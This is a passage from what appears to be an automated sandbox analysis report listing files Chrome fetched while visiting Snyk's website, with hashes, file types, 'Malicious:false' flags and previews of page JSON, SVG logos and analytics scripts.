                                                                                                                                                                                                                                                                                                              Preview:....,e.f..tmpnxgs__sw.....6.(.U...Y.a<I..=...8..y5N...zs..q.%W..Ic..~..!.d...s..M.I$A..A.....E0J.0...k..Z.D.(...{..%........7>J...}ls.._...'.w.I..y....gW.4.."..<.&Y_.#7._..G.....F<YDA.....G.?O..X..b.#.j.W..>_.7uo>..........t........n7..^4.0A..<.$7.hcC..w..t.....h.2_...f.....h.}..m9u...n..q....8..|.@s.O.0n..c~..\f.y.P.*..p.F.*.TV.=5.)...;....$Ep.C..5.v.U"V./Hi@TVH.Zknr?..u./..z.u.#..MA.| (...'.?......2oC.\.Zs.@.aP.y.).\Z.Mo1M,..B...&j&7QxW..]...Q.....O...l.'5Y.....[o..uK..pv.........8Z.x..6V.2..i."VL....aI+i..@.+.......C.?P#..KgGcm.....,..].'.y..2H...I.1..\...c...2o.+?..N..e5..._Iq~%j~...J.M=-k......0...../6.Q.-Ns.&.&....&I.b.d...3]......(.M...jj..._$.G.>.X......F...&pCh.K.>....:?.[....!.y0T$Q.WT..o.$......a.A..05......+..j..........F...!../...,.'....e../.q...f9...2....`....%..`t3\.......x..2..Y.mG.w_.c...j.b....Ha..mt..ij..%.Rv.]." ..p.q.J......s.O.8.u..b~D...{.EBy,..`v..j...+....w.~...;?u~...z..V.-r../[.....v.F.0K.1.,|}],o..y#.K.............
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.966738780375731
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:YGKexGHLKFD/xY:YGKex6K5/xY
                                                                                                                                                                                                                                                                                                              MD5:B4A072B06C68AB515897B81085ED4F41
                                                                                                                                                                                                                                                                                                              SHA1:E8370C1EF39DB24DDEB0FAE9896A17C7009D3310
                                                                                                                                                                                                                                                                                                              SHA-256:8A243A15708323B2F7EBC5A23B9E89E9E7BC4ADC566BD436E0AE79935E7999B2
                                                                                                                                                                                                                                                                                                              SHA-512:839FA877179056B2A1C08AA4DA12CA3645D0CB4E5331E590AFCD5AF532D2BE6C3FA44A23AED89FA97552F21201747A6DBC8220F23FEAB863EFAF5FF2895FB993
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"code":"not_found","message":"Not found"}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65476), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):73635
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.084714370515501
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:/hlpnHLylhKbgESpRoYC8gJlnpazNP00t+R6lmPdEMVvpxl+fm9re9PE8waMe:/zpHLyPNESppGJoPzQSmpXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:93B0DCDE13D4C738580DAA17462EC13A
                                                                                                                                                                                                                                                                                                              SHA1:20EF972E862D354615E991DD83024FCB332DFB46
                                                                                                                                                                                                                                                                                                              SHA-256:908A9CF828A59BD4964053ADF5C24C9E8397AC5EFB2E92BB9FDE196BDFC61E88
                                                                                                                                                                                                                                                                                                              SHA-512:AF8CE63A2866BDEEF5A9EF4817B0ADBAB7CBE771CD82ADEB1FBA920BBD84ED8B279BA7B624DB89BF6AC435ED97D576F60F7FC47E39A077218D46CAE31D88A3F6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/code-checker.json
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6XgXGIlyIMBLxBpv6Lq9oE","type":"Entry","createdAt":"2022-12-08T16:11:17.016Z","updatedAt":"2023-06-13T20:42:10.317Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":43,"revision":13,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateCodeChecker"}},"locale":"en-US"},"fields":{"internalName":"\"Code Checker\"","title":"Code Checker | Free Code Security Tool Powered by AI | Snyk","slug":"/","pageLocalization":["de","fr","ja"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2FMuZI18CtjHdoqd0HpGsH","type":"Entry","createdAt":"2022-12-05T12:06:05.120Z","updatedAt":"2023-06-13T20:33:22.052Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":25,"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):214
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.015695539205614
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:tnrVli/UTumc4slvIXK7VLhLQ3cpRkWbD6+:trVumuCXgh23c/Tbe+
                                                                                                                                                                                                                                                                                                              MD5:E1D072F143FE3601A332525409D30B40
                                                                                                                                                                                                                                                                                                              SHA1:4DCD67A059FB2D48D369DE5D5EA7234ADF6BBDE1
                                                                                                                                                                                                                                                                                                              SHA-256:305BE9E636846FFD82C4865B5FA2B9763EECA988BC3586A871D3B81A93CE0548
                                                                                                                                                                                                                                                                                                              SHA-512:527C341A4241EC99383AC3501ABFE491CADCF6BFB5A715CF9DA0E8FDE612132269FE206DF468F888AD36F68177FE2044D8A8383B6733D2E61530CAD2ABDEE4BD
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg width="12" height="8" viewBox="0 0 12 8" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M1.41 0.294983L6 4.87498L10.59 0.294983L12 1.70498L6 7.70498L0 1.70498L1.41 0.294983Z" fill="#145DEB"/>.</svg>.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (43489), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):43554
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.12853225291825
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:w1rdZ4IueymYs3BwEMVvpxl+fm9re9PE8waHe:Urdmbe7sXr9faHe
                                                                                                                                                                                                                                                                                                              MD5:8D7FEF3250BD4835198C9BC6E8C3359B
                                                                                                                                                                                                                                                                                                              SHA1:54F1956CD697A8E00F6F393B055CEC6159E6BAC8
                                                                                                                                                                                                                                                                                                              SHA-256:6AE9B94A90851F0767AA67729073E26B5D2A6D928B587EFD1C7E83B795A7543D
                                                                                                                                                                                                                                                                                                              SHA-512:04EF443261191A32E3607809898308C74197AD0A913713F34D96B6E3CCC1F34D7462A80ADF767F0E0C4D6C0AFDAEDD53E828E67FD02BC1B326F35C7EBD0A05B2
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/news/snyks-ai-native-sast-product-passes-100m-in-arr.json?slug=snyks-ai-native-sast-product-passes-100m-in-arr
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4QATfMKSPkK9MJJ5OWXIfy","type":"Entry","createdAt":"2024-10-02T12:00:03.564Z","updatedAt":"2024-10-02T16:56:21.341Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":41,"revision":3,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templatePressRelease"}},"locale":"en-US"},"fields":{"internalName":"Snyk.s AI-Native SAST Product Passes $100M in ARR - Press Release","title":"Snyk.s AI-Native SAST Product Passes $100M in ARR","slug":"snyks-ai-native-sast-product-passes-100m-in-arr","featuredImage":[{"url":"http://res.cloudinary.com/snyk/image/upload/v1727870043/feature-code-rise.png","tags":[],"type":"upload","bytes":715765,"width":1200,"format":"png","height":628,"version":1727870043,"duration":null,"metadata":{},"public_id":"feature-code-rise","created_at":"2024-10-02T11:54:03Z",
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (6145), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):6145
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.413610880345927
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:Dp6cF7ZZ7IRn+DVk3+kk21uJq3faN9kV41w6C+:96k7fIRn+DVk3vk2oJq3fabkg2+
                                                                                                                                                                                                                                                                                                              MD5:F2700B090163D2C01B8AAD0ACC016E4A
                                                                                                                                                                                                                                                                                                              SHA1:F0D48E567CB7EFB774103AC85BE28079C160A644
                                                                                                                                                                                                                                                                                                              SHA-256:64DB9C0572CC47DF24F75E4EA67FA6D152D5D5D81F71C161C9A841FAB5B2C53C
                                                                                                                                                                                                                                                                                                              SHA-512:F4EBEAE01944E08CF95703FDE258E35F5C1E8FD470C85A1E2869D7DF6408CEFAB5945D6410A8F7A0AD62F2B4D5D2545904FE2E6D19BCD8CC4C28798222166B93
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:!function(e){function webpackJsonpCallback(c){for(var r,d,t=c[0],n=c[1],_=c[2],u=0,i=[];u<t.length;u++)d=t[u],a[d]&&i.push(a[d][0]),a[d]=0;for(r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r]);for(o&&o(c);i.length;)i.shift()();return f.push.apply(f,_||[]),checkDeferredModules()}function checkDeferredModules(){for(var e,c=0;c<f.length;c++){for(var r=f[c],d=!0,t=1;t<r.length;t++){var n=r[t];0!==a[n]&&(d=!1)}d&&(f.splice(c--,1),e=__webpack_require__(__webpack_require__.s=r[0]))}return e}var c={},r={6:0},a={6:0},f=[];function __webpack_require__(r){if(c[r])return c[r].exports;var a=c[r]={i:r,l:!1,exports:{}};return e[r].call(a.exports,a,a.exports,__webpack_require__),a.l=!0,a.exports}__webpack_require__.e=function requireEnsure(e){var c=[];r[e]?c.push(r[e]):0!==r[e]&&{1:1,3:1,4:1,8:1,16:1,23:1,25:1,27:1,28:1,30:1,31:1,33:1,35:1,36:1,38:1,39:1,44:1,45:1,46:1,47:1,48:1}[e]&&c.push(r[e]=new Promise(function(c,a){for(var f="assets/css/"+({}[e]||e)+"."+{0:"31d6cfe0",1:"fdc718c4",2:"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):1906
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.3872195802319025
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:c74EPofTvGoVqEQEV1L85T8rH/go6z3PyOV:rVfzVqE385T0UPb
                                                                                                                                                                                                                                                                                                              MD5:E99543BB86794E15928D03E9B41BB3C8
                                                                                                                                                                                                                                                                                                              SHA1:66938EAAA4FF7C21EE6B7C3C5FEFBC004EE6D7C9
                                                                                                                                                                                                                                                                                                              SHA-256:A33A47A20C0EC6B0C13AF43AE681BF73023E4A35F792CB055700E94D467F236D
                                                                                                                                                                                                                                                                                                              SHA-512:E8D0B37870343E0C4CF521459EBC2DE473EC553CBA13F9C7727C361959833A262E6C251718656950AD8D1BC372C168E570C505AA816F8CD11A677A175ACC2126
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/v1504872631/customer-logos/google.svg
                                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 272 92" width="272" height="92"><path fill="#EA4335" d="M115.75 47.18c0 12.77-9.99 22.18-22.25 22.18s-22.25-9.41-22.25-22.18C71.25 34.32 81.24 25 93.5 25s22.25 9.32 22.25 22.18zm-9.74 0c0-7.98-5.79-13.44-12.51-13.44S80.99 39.2 80.99 47.18c0 7.9 5.79 13.44 12.51 13.44s12.51-5.55 12.51-13.44z"/><path fill="#FBBC05" d="M163.75 47.18c0 12.77-9.99 22.18-22.25 22.18s-22.25-9.41-22.25-22.18c0-12.85 9.99-22.18 22.25-22.18s22.25 9.32 22.25 22.18zm-9.74 0c0-7.98-5.79-13.44-12.51-13.44s-12.51 5.46-12.51 13.44c0 7.9 5.79 13.44 12.51 13.44s12.51-5.55 12.51-13.44z"/><path fill="#4285F4" d="M209.75 26.34v39.82c0 16.38-9.66 23.07-21.08 23.07-10.75 0-17.22-7.19-19.66-13.07l8.48-3.53c1.51 3.61 5.21 7.87 11.17 7.87 7.31 0 11.84-4.51 11.84-13v-3.19h-.34c-2.18 2.69-6.38 5.04-11.68 5.04-11.09 0-21.25-9.66-21.25-22.09 0-12.52 10.16-22.26 21.25-22.26 5.29 0 9.49 2.35 11.68 4.96h.34v-3.61h9.25zm-8.56 20.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):105589
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.174579671892662
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:MLMeCBCBkyC/MFRo43esRdLyWQL9XJYOLBOiDYdveR2CjRBKF2FTm7L/PTDFlIs4:0CBNR/E1D82vnCjRBKFgTmbRFnOoh2
                                                                                                                                                                                                                                                                                                              MD5:C041A31B4F3AFDBD4F597D68FBC4DE22
                                                                                                                                                                                                                                                                                                              SHA1:23AE116FB22FB17623D6D42C525EB256A423BB5A
                                                                                                                                                                                                                                                                                                              SHA-256:CB5842B2430D3BA471D14A1B010A508D2CDACBCCD007797F34021B651D22FB53
                                                                                                                                                                                                                                                                                                              SHA-512:C9049ED8B4FE6F1BD3FF3B01F213D22075992CD0F2B6D0461A618C33F2B96F0FB3E0153B7B0C48F6F6F7BBF79F8195F89A6283FB9546A82A6021A9BBE1236C1B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:!function(){var t,e,n,r,i={8878:function(t,e,n){"use strict";var r=this&&this.__importDefault||function(t){return t&&t.__esModule?t:{default:t}};Object.defineProperty(e,"__esModule",{value:!0});var i=r(n(325));function o(t,e){return function(){var n=this.traits(),r=this.properties?this.properties():{};return i.default(n,"address."+t)||i.default(n,t)||(e?i.default(n,"address."+e):null)||(e?i.default(n,e):null)||i.default(r,"address."+t)||i.default(r,t)||(e?i.default(r,"address."+e):null)||(e?i.default(r,e):null)}}e.default=function(t){t.zip=o("postalCode","zip"),t.country=o("country"),t.street=o("street"),t.state=o("state"),t.city=o("city"),t.region=o("region")}},4780:function(t,e,n){"use strict";var r=this&&this.__importDefault||function(t){return t&&t.__esModule?t:{default:t}};Object.defineProperty(e,"__esModule",{value:!0}),e.Alias=void 0;var i=r(n(1285)),o=n(9512);function s(t,e){o.Facade.call(this,t,e)}e.Alias=s,i.default(s,o.Facade),s.prototype.action=function(){return"alias"},s.p
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1032 x 1363, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):205530
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.980865135464369
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:GC7A5jCoV02LGrLtOQJy4NRjcgS+7DNvnl:d7c30YVQA4HjcKXNvnl
                                                                                                                                                                                                                                                                                                              MD5:EE2E7FA3418C66D547E504BD27716092
                                                                                                                                                                                                                                                                                                              SHA1:071B55D8895D58B0ADB8808E21BAC3A04403E80C
                                                                                                                                                                                                                                                                                                              SHA-256:2BDC1D84E325FB5A37E3CE20DD09F4A9BD20A15BF0AF63ADCF4C4C38CAC7053D
                                                                                                                                                                                                                                                                                                              SHA-512:0E82757CB3458F8085922247689CA90656E2206BADD5366A981F9FE22EC28E378A0F25D186A626941CD34A807D1725BDEF098EF566FDED10A15CB4CACF9873F6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.......S.....@.......pHYs..........+.....3tEXtComment.xr:d:DAFMIp6bb9g:2,j:35243528497,t:22091318..iw.."MIDATx....s.....P..I..)S..{.Jf..V...r.a.0...kNY.Ij<..b[.(.d.r.v*.D[..........B,..~............TA"..o5.......e.1..................G@...............................................................................................o.....1...+o..$Y...w...[]]V.g............H.l^.pL.n?.LpM.....#G|.<.....zN..G....].YG.......@..@./.......,c6o..@...h!....h...R.{..,K.......g.~C/.rV>.OJ.....>.`F..+Z].P.......~kP?|cTW.. ..............fB+...?U..dJ.X.......\<....o...\$$xF.g45.......g..sz.O.........b......j.-.......m.....|m......|Ro..KM<X...9..l.........$..JZ7.wR.............Z.H..1....i.....J..@...|R......M.j...'...~..hj.s..q}....7.03.........I.s......Z..p.(.....*..OB1=.rQ..5k.m'.q..?Ok6...|.5....[M7yf...h%...-a<.......<...(........r.>..X.........}.....P..JZ..l.g....V# ......z...+..k.Q-...$ou)......l..'.g.z...F..R$.5...hc....]...w.4;U.p...p.Q..3iG.?.+
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65522), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):71072
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.152262989280455
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:qa6nz6Yz6As0GcmOaTxJIbf+OhvQNXr9faMe:qa6nz6Yz6B0GcoTxshB
                                                                                                                                                                                                                                                                                                              MD5:ED82AC095051466B9D03B216F181342D
                                                                                                                                                                                                                                                                                                              SHA1:7DB1CB1F15B2B8876313BF16E4372C6144658A53
                                                                                                                                                                                                                                                                                                              SHA-256:FFC3A6ABF410B68F46AF8391A2EDE58690484EECE5BBC81EB90EE4F178C55346
                                                                                                                                                                                                                                                                                                              SHA-512:85D5212BD2190D78A42D6ABE571391C54984DBE62D703BA9A8138F47B3267BC19622AEC8A363185C8B7C0A5DC8A48EFF1B75ED61AFFF77772C6C7ABD6CCCF7DC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2pesnRUd4EuQtDoD1WgKHR","type":"Entry","createdAt":"2022-07-19T18:59:08.588Z","updatedAt":"2024-06-24T19:36:16.485Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":196,"revision":63,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Homepage","title":"Developer security","slug":"/","uri":"/","pageLocalization":["fr","ja","de","pt-BR"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"7d2Of140vuyBtYvbvTvJz2","type":"Entry","createdAt":"2022-09-13T18:07:49.153Z","updatedAt":"2024-10-02T15:57:53.136Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":114,"revision":36,"contentType":{"sys"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65517), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):78852
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.17156068477932
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:URqY9Z2oY7yAfTTp5LbUPhy4wwObrsEEMVvpxl+fm9re9PE8waMe:xe/Y7yAfTP30waYXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:E99B4DB9B9EE7D88A4F3499CDCCFB68A
                                                                                                                                                                                                                                                                                                              SHA1:FBAAA08EBB1179EE35C1CA7D72FE621CBB576F7A
                                                                                                                                                                                                                                                                                                              SHA-256:297C1877DEA7336FA0C25128D5A779BF91ECF600A14425284D7D4F7A780C0849
                                                                                                                                                                                                                                                                                                              SHA-512:2F85BE05BDBE3729676CD2DBEC5403A0550BCF229023364754B840657AB6BC351EC9EAD6BBF20E594A67F6BE882F84F13AE13467AD4001D5F6F535A1CE959F58
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3ZCwCoYITTiz8r20WAi4D0","type":"Entry","createdAt":"2023-03-15T14:38:01.012Z","updatedAt":"2023-07-18T01:50:00.164Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":54,"revision":5,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"\"snyk top 10\" - landing page","title":"Snyk Top 10 Vulnerabilities | Snyk","slug":"snyk-top-10-vulnerabilities-or-snyk","uri":"snyk-top-10","pageLocalization":["ja"],"featuredImage":[{"url":"http://res.cloudinary.com/snyk/image/upload/v1678773524/snyk-top-10/feature-snyk-top-10-oss-2022.jpg","tags":[],"type":"upload","bytes":298679,"width":1200,"format":"jpg","height":628,"version":1678773524,"duration":null,"metadata":[],"public_id":"snyk-top-10/feature-snyk-top-10-oss-2022","created_at":"2
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (51384), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):51385
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.293328685395304
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:IaOFhhRC5JFhLjfRysgLzQynDw5YyDMFW8KQ:IaOFnR2DRszQKaoWtQ
                                                                                                                                                                                                                                                                                                              MD5:6626C1362840EBFC8F48294E8F023E18
                                                                                                                                                                                                                                                                                                              SHA1:4EC0DFB37C3E536C1B5EC04B68C9846FDBAF9EEF
                                                                                                                                                                                                                                                                                                              SHA-256:AABC88A6DB8B22022F96CA88E4F0A7BE426ABEF2B35169A71515A2D55246402A
                                                                                                                                                                                                                                                                                                              SHA-512:B037A19B52C1047198EC7F19E99066054E454964380E2354239834260D11248E617D6759B944DDF39A25B883C8F430603D8E13097396E2DEDA9BB6905C1CD42A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://bat.bing.com/bat.js
                                                                                                                                                                                                                                                                                                              Preview:function UET(o){this.stringExists=function(n){return n&&n.length>0};this.domain="bat.bing.com";this.domainCl="bat.bing.net";this.URLLENGTHLIMIT=4096;this.pageLoadEvt="pageLoad";this.customEvt="custom";this.pageViewEvt="page_view";o.Ver=o.Ver!==undefined&&(o.Ver==="1"||o.Ver===1)?1:2;this.uetConfig={};this.uetConfig.consent={enabled:!1,adStorageAllowed:!0,adStorageUpdated:!1,hasWaited:!1,waitForUpdate:0,enforced:!1};this.uetConfig.tcf={enabled:!1,vendorId:1126,hasLoaded:!1,timeoutId:null,gdprApplies:undefined,adStorageAllowed:undefined,measurementAllowed:undefined,personalizationAllowed:undefined};this.uetConfig.cusig={hasLoaded:!1,timeoutId:null,blob:{}};this.beaconParams={};this.supportsCORS=this.supportsXDR=!1;this.paramValidations={string_currency:{type:"regex",regex:/^[a-zA-Z]{3}$/,error:"{p} value must be ISO standard currency code"},number:{type:"num",digits:3,max:999999999999},integer:{type:"num",digits:0,max:999999999999},hct_los:{type:"num",digits:0,max:30},date:{type:"regex",
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 2207
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):1062
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.777847508659921
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:XpnVCU3GhTo/508W83VbSZQJMDhBY4dJyhYtFXMwN8:XlVCjofdVboY4dTtF8wC
                                                                                                                                                                                                                                                                                                              MD5:E3B346A4F0B35B7FF884730F4C61CD2E
                                                                                                                                                                                                                                                                                                              SHA1:DF4050CE0E0F7AE7E37CE6E0290E4817FF9595D0
                                                                                                                                                                                                                                                                                                              SHA-256:0CBEE3E3F7123D4B0E5D9A72CE33548B3F6DD4141B83EF4506770A92D880DB8C
                                                                                                                                                                                                                                                                                                              SHA-512:08342B70A65A9FB908F545627503FE34564EB3032367294ED239EF058AB32F4DEEBC5533F831F3BBB58CDB5310BDC7F95414AD027BB596CD2859520FE8F210B3
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://cdn.segment.com/next-integrations/integrations/linkedin-insight-tag/1.0.1/linkedin-insight-tag.dynamic.js.gz
                                                                                                                                                                                                                                                                                                              Preview:...........U.n.6.}.PX@...m.....K..".../.`..m3KS\...u....f'.........{...>;UR....gR;...3..?..N.E..H...r/+.&_.(.IQm....bV^.....</.w......<....7./.m.j].........:.U.s...0(g....a..D....n#K81Lg....D..<'......2T.....x..sf."'..;Qxjl.+.3.n........w..J%..8....q...v.$l.1L.M..FRG5~..X0....?.Zpq...t5 .+.6r......l.Pn..%.....p..7ch`3F.......lj.~..Lf:'..L!~..\.A... S3..<..0Ve5. ...n,.$uF.B$...0.'.:...H..7m..!.._^...!)#b..)W..4...k*.6......#..sM..dF....i.....X..D..C....g..[.....2..Q..M..sZ.%~x.s[...b.h+......J...Z..hp....E..Kt.ByT...n..T.w_..J..........%.,U.9.P......%e.X...j'.....~..Y.C.Bj=...X...)....j.Bl...q...K....=....~j.p0..K.K..Ap.k...w^x.............O=.L.=KFw.."j.......:v..1.R.lj......7Z.=.f...X...&.#.>...IJz.W.MP.6.C...a...{.4....Yh...#.}.P`..[..R....n.4....%.......H..X....d..0\;V?..$C....L{.K.a?...v".)..L;.........G3?.:...i.....y.A. L+..D.[.....Ap..(9.r...G...m.7n>.8...Y....(`.;.......n......_....S.VGy.Zz..G......zP.......,...(..^b!K..&i....
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (36995), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):36995
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.200154539819763
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:h90Wjj74oB5Tf1JcNvDIweEzpg3pmAX7XODXWcWLfN5HS8IWpMvyfA+g/v:h90yj74A4pDNpM7XGWRfN51IOfA+2v
                                                                                                                                                                                                                                                                                                              MD5:7B7E39FCA61E2FC0B605DB6B496695F1
